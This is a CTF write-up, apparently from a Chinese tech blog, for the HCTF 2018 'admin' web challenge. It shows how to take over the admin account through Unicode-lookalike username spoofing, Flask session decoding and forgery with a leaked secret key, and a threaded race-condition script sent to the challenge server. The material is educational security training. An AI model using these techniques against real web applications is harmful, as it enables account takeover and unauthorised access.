当前位置:网站首页>[HCTF 2018]admin
[HCTF 2018]admin
2022-07-30 06:35:00 【Msaerati】
unicode欺骗
0x01 信息收集
The most important thing to get a website is, of course, to collect information,The information gathered determines the direction of penetration.
I have collected the following information on this website:
- Existing pages havelogin register posts(404) index change(修改密码)
- 在changeThe source code address of the website found in the source code of the page is as follows
0x02 unicode欺骗
Download the source code for code auditing,首先对routes.pyThe audit is performed as follows
It is found that the registration and login and password modification are only lowercase of the data,And strangely the lowercase function is not usedpython自带的,而是自己封装的,Intuition tells me that there is a problem here.
So let's see how this function is encapsulated 如下
nodeprep.prepareThis method converts uppercase letters to lowercase letters,但是它存在一个问题:
它会将unicode编码的ᴬ转化成A
unicode参考表:Search - Unicode Character Table
We know through code auditinglogin register changeused everywherestrlower()函数,都会使用到nodeprep.prepare函数.
Now let's clear our minds,我们只要获得adminThe user's login permission is sufficient,login register changeAll three are usedstrlower()函数,
Maybe we can get throughnodeprep.prepareThis feature of the function to achieve the changeadmin用户的密码,So how do we do it?
First we can register oneᴬdmin用户,After the registration is successful, the account saved in the backend is actually Admin,Then we are changing the password,因为strlower()Uppercase letters can be lowercase,So what we changed isadmin的密码
min--->Admin--->adminᴬd
Next let's register one firstᴬdmin账号
log in to this account
主页面如下,You can see that the displayed account is Admin
Next we change the password,把密码修改为test
可以看到修改成功
登录admin用户后,看到如下
0x03 flask session 伪造
看到源代码,可以知道这个web使用的flask框架写的,flask存在一个session伪造漏洞.
flask的session保存在客户端,Generally, only a signature is added to prevent interception and modification,But without encryption we can be rightsessionDecode to get the user data in it. If we are getting the signature key,It can be faked according to the decoded data,Regenerate the signaturesessionto deceive the server. flask的session使用base64对bytestype of user data to encode,And there may be compression before encoding(session以 "." At the beginning it indicates that compression was performed) flask 保存在cookie里面的session一般格式为 data.timestamp.signature ## 客户端session安全学习:https://www.leavesongs.com/PENETRATION/client-session-security.html#
We can know through code auditing,没有对session进行加密,而且在config.pygot the signing key
这说明我们可以进行session伪造,But how to get itflag那,In the process of code auditindex.html中还发现
只要在indexLet in the interfacesession['name']的值为admin就可以获得flag.
我们先获取index界面的session
.eJxFkEGPgjAQhf_KZs4cAOPFxIOkSCSZIUsKTXsx6iKlUjcBjFrjf99qNruHucyb-ebNe8D2ODSjhsU0XJoAtt0XLB7wsYcFEEuviq3miq_uZOVM8tQpVlsZvyo_kd1ElFURsV4j3zjKSiNNGpGjk7R5j6LuJU-04klPTJkiUwbZIca47pBX84LjrWBkUXiOKI0yuve7WprVjeznrOBl5z3cMVvrQpQWXemZaYgu0cQT42-HiuPVzy7hGcBhHI7b6fvUnP9ekELOpVgb4q1Dl3do2kiJ1KGRM48OyVAvba0pzi29elzG1C7fuM7u2uY_jJo21a9y3lkvwNSMEwRwGZvhHRtEITx_AFRzbBo.X0c0OQ.4qb0LysG2sqb3NHTApcnuwpAULw
Then we use as followspythonThe script decodes him:
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
{'_fresh': True, '_id': b'410d09e026f7a13d5fcefcbd6b54e549a1234dcb1573dbbe1eea0ae0e46c8fc0763eb15993183f1b55dcf8e73ab016d794b4120aa9df34e1a430a50c4e4e306d', 'csrf_token': b'af9aac58332b285ea326741463ebea7bf6675666', 'image': b'5SHR', 'name': 'test', 'user_id': '10'}
in the data that will be obtainedtest替换成admin,Then re-sign(The script address to use:https://github.com/noraj/flask-session-cookie-manager)
.eJxFkEGLwkAMhf_KkrOHtuJF8GCZWiwkZcvYIXMRV2unY8eFqqgj_vcdZdk95JKXfHl5D1jvh-ZkYHoeLs0I1t0Opg_4-IIpkMiuWswnWs7v5HjMMvNa1I6TVxUHcsuY8lVMojcol57yyrLNYvJ0YFf0qOqeZWq0THsS2pa5tii2CSZ1h3I1KSXeSkEOVeCoympr-rBr2M5v5D7Hpay64OGO-cKUqnLoq8DMIvSpIZnacDvSEq9hdgbPEWxPw359_j40x78XWPGE1cKSbD36okPbxlplHi2PAzoiSz272lBSOHr1JCfUzt64zm3a5j-MmparX-W4cUGAzc51RxjB5dQM79wgjuD5A8BwbGM.X0c24g.yUFbBmBBsRINcJJ0r0SvkWfPh4A
替换session,Get after refresh
0x04 条件竞争
Change the password just fromsession里面取namevalue can be modified,如果让这个name值为adminmodification can be achievedadmineffect of the account.
When logging in to the user, the user name is directly assigned without verificationsession的name,So when we log in while changing the passwordadmin用户,Theoretically, it is possible to modify itadmin账户的.
可以通过pythonWrite a two-threaded script,A thread logs in to the test account to change the password,A thread logs out of the test account loginadmin(Login here refers to just the usernameadmin密码不正确)
import requests
import threading
def login(s, username, password):
data = {
'username': username,
'password': password,
'submit': ''
}
return s.post("http://admin.2018.hctf.io/login", data=data)
def logout(s):
return s.get("http://admin.2018.hctf.io/logout")
def change(s, newpassword):
data = {
'newpassword':newpassword
}
return s.post("http://admin.2018.hctf.io/change", data=data)
def func1(s):
login(s, 'skysec', 'skysec')
change(s, 'skysec')
def func2(s):
logout(s)
res = login(s, 'admin', 'skysec')
if '<a href="/index">/index</a>' in res.text:
print('finish')
def main():
for i in range(1000):
print(i)
s = requests.Session()
t1 = threading.Thread(target=func1, args=(s,))
t2 = threading.Thread(target=func2, args=(s,))
t1.start()
t2.start()
if __name__ == "__main__":
main()
边栏推荐
猜你喜欢
随机推荐
浏览器缓存
C语言:通过函数实现一个整形有序数组的二分查找
关于浅拷贝和深拷贝,草稿闲了写
Detailed MySQL-Explain
【无标题】ES5新特性
php漏洞全解
MySQL存储引擎
P3 元宝的笔记
Koa2框架快速入门与基本使用
sqli-labs less3/4打靶笔记
认识虚拟dom
awd——waf部署
mysql处理insert冲突的解决方案
JDBC一文搞懂
空杯心态,知行合一
MySQL storage engine
零基础C语言“函数”教程,有手就行
CTF misc-audio and video steganography
Art-template 中文文档[详细篇]
Solution to TypeError The view function did not return a valid response. The function either returned None